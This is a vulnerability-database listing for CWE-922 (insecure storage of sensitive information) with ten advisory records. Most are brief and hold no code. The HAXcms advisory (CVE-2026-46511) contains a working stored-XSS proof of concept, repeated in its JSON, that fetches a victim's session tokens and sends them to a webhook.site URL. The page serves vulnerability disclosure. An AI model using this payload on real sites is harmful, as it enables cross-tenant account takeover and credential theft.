Common Weakness Enumeration

CWE-922

Allowed-with-Review

Insecure Storage of Sensitive Information

Abstraction: Class · Status: Incomplete

The product stores sensitive information without properly limiting read or write access by unauthorized actors.

437 vulnerabilities reference this CWE, most recent first.

GHSA-WMQV-RV2P-FFX8

Vulnerability from github – Published: 2022-05-24 16:45 – Updated: 2022-05-24 16:45
VLAI
Details

SUSE Manager until version 4.0.7 and Uyuni until commit 1b426ad5ed0a7191a6fb46bb83e98ae4b99a5ade created world-readable swap files on systems that don't have a swap already configured and don't have btrfs as filesystem

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-3684"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-922"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-05-13T15:29:00Z",
    "severity": "MODERATE"
  },
  "details": "SUSE Manager until version 4.0.7 and Uyuni until commit 1b426ad5ed0a7191a6fb46bb83e98ae4b99a5ade created world-readable swap files on systems that don\u0027t have a swap already configured and don\u0027t have btrfs as filesystem",
  "id": "GHSA-wmqv-rv2p-ffx8",
  "modified": "2022-05-24T16:45:34Z",
  "published": "2022-05-24T16:45:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3684"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.suse.com/show_bug.cgi?id=1131954"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-WPXJ-R4VX-G93M

Vulnerability from github – Published: 2024-02-16 03:30 – Updated: 2024-11-26 18:38
VLAI
Details

In multiple files, there is a possible way that trimmed content could be included in PDF output due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-40093"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-922"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-02-16T02:15:49Z",
    "severity": "MODERATE"
  },
  "details": "In multiple files, there is a possible way that trimmed content could be included in PDF output due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.",
  "id": "GHSA-wpxj-r4vx-g93m",
  "modified": "2024-11-26T18:38:46Z",
  "published": "2024-02-16T03:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40093"
    },
    {
      "type": "WEB",
      "url": "https://android.googlesource.com/platform/cts/+/a952c93009cc81c41a086d73a4030a83b7683a04"
    },
    {
      "type": "WEB",
      "url": "https://android.googlesource.com/platform/external/pdfium/+/03925281cf25fec70318bf2225356d022b12b566"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2024-02-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X3WJ-Q2GH-27VC

Vulnerability from github – Published: 2022-05-24 19:05 – Updated: 2022-05-24 19:05
VLAI
Details

Insecure storage of sensitive information has been reported to affect QNAP NAS running myQNAPcloud Link. If exploited, this vulnerability allows remote attackers to read sensitive information by accessing the unrestricted storage mechanism. This issue affects: QNAP Systems Inc. myQNAPcloud Link versions prior to 2.2.21 on QTS 4.5.3; versions prior to 2.2.21 on QuTS hero h4.5.2; versions prior to 2.2.21 on QuTScloud c4.5.4.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-28815"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-922"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-16T04:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Insecure storage of sensitive information has been reported to affect QNAP NAS running myQNAPcloud Link. If exploited, this vulnerability allows remote attackers to read sensitive information by accessing the unrestricted storage mechanism. This issue affects: QNAP Systems Inc. myQNAPcloud Link versions prior to 2.2.21 on QTS 4.5.3; versions prior to 2.2.21 on QuTS hero h4.5.2; versions prior to 2.2.21 on QuTScloud c4.5.4.",
  "id": "GHSA-x3wj-q2gh-27vc",
  "modified": "2022-05-24T19:05:32Z",
  "published": "2022-05-24T19:05:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28815"
    },
    {
      "type": "WEB",
      "url": "https://www.qnap.com/zh-tw/security-advisory/qsa-21-26"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-X3X5-7H4H-GWXG

Vulnerability from github – Published: 2026-05-19 14:47 – Updated: 2026-06-09 11:56
VLAI
Summary
HAXcms: Mass Token Exfiltration and Cross-Tenant Hijack
Details

Summary

An attack chain utilizing Stored XSS alongside dynamic token exposure in the /system/api/connectionSettings endpoint allows an authenticated attacker to perform a complete cross-tenant account takeover. The API dynamically leaks the active session's authentication tokens (including the jwt, user_token, site_token, and appstore_token) into a global JavaScript variable (window.appSettings). An attacker can exploit the XSS vulnerability to force a victim's browser to silently fetch their specific connection settings, extract the tokens, and exfiltrate them to an attacker-controlled webhook.

Details

In Operations.php (connectionSettings()), the system returns a Javascript object designed to bootstrap the frontend context. This object, window.appSettings, acts as a "skeleton key" because it aggregates all necessary operational tokens for the active session.

While HAXcms correctly relies on the cryptographically signed JWT for backend authentication (preventing Direct Object Reference/IDOR attempts), the CMS fails to secure the tokens themselves. Specifically: 1. The Vector: The system is vulnerable to Stored XSS (e.g., via injected iframe srcdoc or <video-player>). 2. The Exposure: Because the connectionSettings endpoint serves the tokens locally based on the active PHPSESSID cookie, any malicious script running in the browser context can intercept these keys. 3. The Chain: HAXcms isolates user environments by URL path (/<username>/). An attacker can use XSS to force the victim's browser to fetch their target username's specific settings via fetch('/<username>/system/api/connectionSettings'). Since the browser implicitly attaches the victim's session cookie, the server authenticates the request and returns the victim's valid JWT and tokens.

PoC

1. Setup the Webhook Target Prepare an external webhook (e.g., webhook.site) to receive the stolen data.

2. Inject the "Kill Chain" Payload As an authenticated attacker (e.g., having edit access to any site), inject the following Javascript via the verified Stored XSS vectors (such as checking the HTML Source of a page and writing an <iframe>):

<iframe srcdoc="<script>
    const targetUsername = 'bto108'; // Replace with target victim

    fetch(`/${targetUsername}/system/api/connectionSettings`)
      .then(res => res.text())
      .then(data => {
          const s = JSON.parse(data.substring(data.indexOf('{'), data.lastIndexOf('}') + 1));

          const uToken = new URL(document.location.origin + s.getUserDataPath).searchParams.get('user_token');
          const sToken = new URL(document.location.origin + s.saveNodePath).searchParams.get('site_token');

          let aToken = 'N/A';
          if (s.appStore && s.appStore.params && s.appStore.params.appstore_token) {
              aToken = s.appStore.params.appstore_token;
          }

          // Exfiltrate via Image Request to bypass CORS
          const payload = btoa(JSON.stringify({
              target: targetUsername, 
              jwt: s.jwt, 
              user_token: uToken, 
              site_token: sToken, 
              appstore_token: aToken
          }));

          new Image().src = `https://webhook.site/YOUR-WEBHOOK-ID?data=${payload}`;
      });
</script>" style="display:none"></iframe>

3. Execution & Verification - When the victim (e.g., user bto108) views the compromised page, their browser automatically fires the fetch request, silently attaching their active session cookie. - The server responds with their connection settings. - The script parses their jwt, user_token, and other keys, encoding them in base64. - The attacker receives the full JWT and token dump on their webhook.

Screenshots confirming the data leakage and webhook capture: Connection Settings Exposure Secondary Settings Leak Cross-tenant Exfiltration Console Webhook Payload Capture Stolen Data Result

Impact

Critical Severity. This attack completely compromises the primary defense mechanism of the CMS. By stealing the jwt and user_token, the attacker achieves total account hijacking without needing the victim's password. They can emulate the victim perfectly, bypassing standard interface restrictions to perform malicious administrative actions (creating/deleting sites, modifying user access, or uploading malicious content).

The reliance on a global Javascript variable (window.appSettings) to store long-lived administrative security tokens creates a devastating chokepoint when combined with XSS.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 25.0.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@haxtheweb/haxcms-nodejs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46511"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-522",
      "CWE-79",
      "CWE-922"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-19T14:47:03Z",
    "nvd_published_at": "2026-06-05T19:16:34Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn attack chain utilizing **Stored XSS** alongside dynamic token exposure in the `/system/api/connectionSettings` endpoint allows an authenticated attacker to perform a complete cross-tenant account takeover. The API dynamically leaks the active session\u0027s authentication tokens (including the `jwt`, `user_token`, `site_token`, and `appstore_token`) into a global JavaScript variable (`window.appSettings`). An attacker can exploit the XSS vulnerability to force a victim\u0027s browser to silently fetch their specific connection settings, extract the tokens, and exfiltrate them to an attacker-controlled webhook.\n\n### Details\nIn `Operations.php` (`connectionSettings()`), the system returns a Javascript object designed to bootstrap the frontend context. This object, `window.appSettings`, acts as a \"skeleton key\" because it aggregates all necessary operational tokens for the active session. \n\nWhile HAXcms correctly relies on the cryptographically signed JWT for backend authentication (preventing Direct Object Reference/IDOR attempts), the CMS fails to secure the tokens themselves. Specifically:\n1. **The Vector**: The system is vulnerable to Stored XSS (e.g., via injected `iframe` `srcdoc` or `\u003cvideo-player\u003e`).\n2. **The Exposure**: Because the `connectionSettings` endpoint serves the tokens locally based on the active `PHPSESSID` cookie, any malicious script running in the browser context can intercept these keys.\n3. **The Chain**: HAXcms isolates user environments by URL path (`/\u003cusername\u003e/`). An attacker can use XSS to force the victim\u0027s browser to fetch their *target* username\u0027s specific settings via `fetch(\u0027/\u003cusername\u003e/system/api/connectionSettings\u0027)`. Since the browser implicitly attaches the victim\u0027s session cookie, the server authenticates the request and returns the victim\u0027s valid JWT and tokens.\n\n### PoC\n**1. Setup the Webhook Target**\nPrepare an external webhook (e.g., `webhook.site`) to receive the stolen data.\n\n**2. Inject the \"Kill Chain\" Payload**\nAs an authenticated attacker (e.g., having edit access to any site), inject the following Javascript via the verified Stored XSS vectors (such as checking the HTML Source of a page and writing an `\u003ciframe\u003e`):\n\n```html\n\u003ciframe srcdoc=\"\u003cscript\u003e\n    const targetUsername = \u0027bto108\u0027; // Replace with target victim\n\n    fetch(`/${targetUsername}/system/api/connectionSettings`)\n      .then(res =\u003e res.text())\n      .then(data =\u003e {\n          const s = JSON.parse(data.substring(data.indexOf(\u0027{\u0027), data.lastIndexOf(\u0027}\u0027) + 1));\n          \n          const uToken = new URL(document.location.origin + s.getUserDataPath).searchParams.get(\u0027user_token\u0027);\n          const sToken = new URL(document.location.origin + s.saveNodePath).searchParams.get(\u0027site_token\u0027);\n          \n          let aToken = \u0027N/A\u0027;\n          if (s.appStore \u0026\u0026 s.appStore.params \u0026\u0026 s.appStore.params.appstore_token) {\n              aToken = s.appStore.params.appstore_token;\n          }\n\n          // Exfiltrate via Image Request to bypass CORS\n          const payload = btoa(JSON.stringify({\n              target: targetUsername, \n              jwt: s.jwt, \n              user_token: uToken, \n              site_token: sToken, \n              appstore_token: aToken\n          }));\n          \n          new Image().src = `https://webhook.site/YOUR-WEBHOOK-ID?data=${payload}`;\n      });\n\u003c/script\u003e\" style=\"display:none\"\u003e\u003c/iframe\u003e\n```\n\n**3. Execution \u0026 Verification**\n- When the victim (e.g., user `bto108`) views the compromised page, their browser automatically fires the `fetch` request, silently attaching their active session cookie.\n- The server responds with their connection settings.\n- The script parses their `jwt`, `user_token`, and other keys, encoding them in base64.\n- The attacker receives the full JWT and token dump on their webhook.\n\n*Screenshots confirming the data leakage and webhook capture:*\n![Connection Settings Exposure](https://github.com/user-attachments/assets/1aeee4ee-9475-4430-b4d3-3c6254075d11)\n![Secondary Settings Leak](https://github.com/user-attachments/assets/7179c1a5-2bfb-4ab6-ba1d-29bcb61a74d3)\n![Cross-tenant Exfiltration Console](https://github.com/user-attachments/assets/1abd21ec-fd45-4bd8-ba67-9c0bb19e6b08)\n![Webhook Payload Capture](https://github.com/user-attachments/assets/751e5cab-f4ad-4ab4-b276-86bf738f0434)\n![Stolen Data Result](https://github.com/user-attachments/assets/a41e15f7-1652-4351-8cc9-a423f6220158)\n\n\n### Impact\n**Critical Severity.** \nThis attack completely compromises the primary defense mechanism of the CMS. By stealing the `jwt` and `user_token`, the attacker achieves **total account hijacking** without needing the victim\u0027s password. They can emulate the victim perfectly, bypassing standard interface restrictions to perform malicious administrative actions (creating/deleting sites, modifying user access, or uploading malicious content).\n\nThe reliance on a global Javascript variable (`window.appSettings`) to store long-lived administrative security tokens creates a devastating chokepoint when combined with XSS.",
  "id": "GHSA-x3x5-7h4h-gwxg",
  "modified": "2026-06-09T11:56:58Z",
  "published": "2026-05-19T14:47:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/haxtheweb/issues/security/advisories/GHSA-x3x5-7h4h-gwxg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46511"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/haxtheweb/issues"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "HAXcms: Mass Token Exfiltration and Cross-Tenant Hijack "
}

GHSA-X4CF-F39J-P3GV

Vulnerability from github – Published: 2022-06-28 00:00 – Updated: 2022-07-08 00:00
VLAI
Details

In Brocade SANnav before Brocade SANnav v2.2.0.2 and Brocade SANnav2.1.1.8, encoded scp-server passwords are stored using Base64 encoding, which could allow an attacker able to access log files to easily decode the passwords.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-28168"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-922"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-27T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "In Brocade SANnav before Brocade SANnav v2.2.0.2 and Brocade SANnav2.1.1.8, encoded scp-server passwords are stored using Base64 encoding, which could allow an attacker able to access log files to easily decode the passwords.",
  "id": "GHSA-x4cf-f39j-p3gv",
  "modified": "2022-07-08T00:00:44Z",
  "published": "2022-06-28T00:00:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28168"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220627-0003"
    },
    {
      "type": "WEB",
      "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1979"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X4VQ-MWG4-R55Q

Vulnerability from github – Published: 2024-11-01 18:31 – Updated: 2024-11-05 21:30
VLAI
Details

Yealink Meeting Server before V26.0.0.67 allows attackers to obtain static key information from a front-end JS file and decrypt the plaintext passwords based on the obtained key information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-48353"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-922"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-01T18:15:07Z",
    "severity": "HIGH"
  },
  "details": "Yealink Meeting Server before V26.0.0.67 allows attackers to obtain static key information from a front-end JS file and decrypt the plaintext passwords based on the obtained key information.",
  "id": "GHSA-x4vq-mwg4-r55q",
  "modified": "2024-11-05T21:30:41Z",
  "published": "2024-11-01T18:31:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48353"
    },
    {
      "type": "WEB",
      "url": "https://www.yealink.com/en/trust-center/security-advisories/b1998ab629254ca3"
    },
    {
      "type": "WEB",
      "url": "http://yealink.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X85P-X37V-Q546

Vulnerability from github – Published: 2025-12-02 09:30 – Updated: 2025-12-02 09:30
VLAI
Details

Insecure Storage of Sensitive Information vulnerability in MeetMe on iOS, Android allows Retrieve Embedded Sensitive Data. This issue affects MeetMe: through v2.2.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-10971"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-922"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-02T08:15:49Z",
    "severity": "HIGH"
  },
  "details": "Insecure Storage of Sensitive Information vulnerability in MeetMe on iOS, Android allows Retrieve Embedded Sensitive Data. This issue affects MeetMe: through v2.2.5.",
  "id": "GHSA-x85p-x37v-q546",
  "modified": "2025-12-02T09:30:26Z",
  "published": "2025-12-02T09:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10971"
    },
    {
      "type": "WEB",
      "url": "https://www.fermax.com/security-advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XFQ2-689P-9P2M

Vulnerability from github – Published: 2022-05-24 19:02 – Updated: 2022-05-24 19:02
VLAI
Details

IBM QRadar User Behavior Analytics 1.0.0 through 4.1.0 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 195999.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-20391"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-922"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-05-14T17:15:00Z",
    "severity": "LOW"
  },
  "details": "IBM QRadar User Behavior Analytics 1.0.0 through 4.1.0 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 195999.",
  "id": "GHSA-xfq2-689p-9p2m",
  "modified": "2022-05-24T19:02:27Z",
  "published": "2022-05-24T19:02:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20391"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/195999"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/6453103"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XG3V-W3XQ-CXVQ

Vulnerability from github – Published: 2022-05-24 19:15 – Updated: 2022-05-24 19:15
VLAI
Details

IBM Edge 4.2 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 189633.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-4809"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-922"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-09-23T17:15:00Z",
    "severity": "LOW"
  },
  "details": "IBM Edge 4.2 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 189633.",
  "id": "GHSA-xg3v-w3xq-cxvq",
  "modified": "2022-05-24T19:15:31Z",
  "published": "2022-05-24T19:15:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-4809"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/189633"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/6491631"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XG85-3Q5W-8WFF

Vulnerability from github – Published: 2024-06-29 06:31 – Updated: 2024-06-29 06:31
VLAI
Details

The Advanced File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.4 via the 'fma_local_file_system' function. This makes it possible for unauthenticated attackers to extract sensitive data including backups or other sensitive information if the files have been moved to the built-in Trash folder.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-5598"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-922"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-29T05:15:02Z",
    "severity": "HIGH"
  },
  "details": "The Advanced File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.4 via the \u0027fma_local_file_system\u0027 function. This makes it possible for unauthenticated attackers to extract sensitive data including backups or other sensitive information if the files have been moved to the built-in Trash folder.",
  "id": "GHSA-xg85-3q5w-8wff",
  "modified": "2024-06-29T06:31:41Z",
  "published": "2024-06-29T06:31:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5598"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/file-manager-advanced/trunk/application/class_fma_connector.php#L13"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3107587"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9d4ff5ed-8857-46b8-942b-ac0f47880a95?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.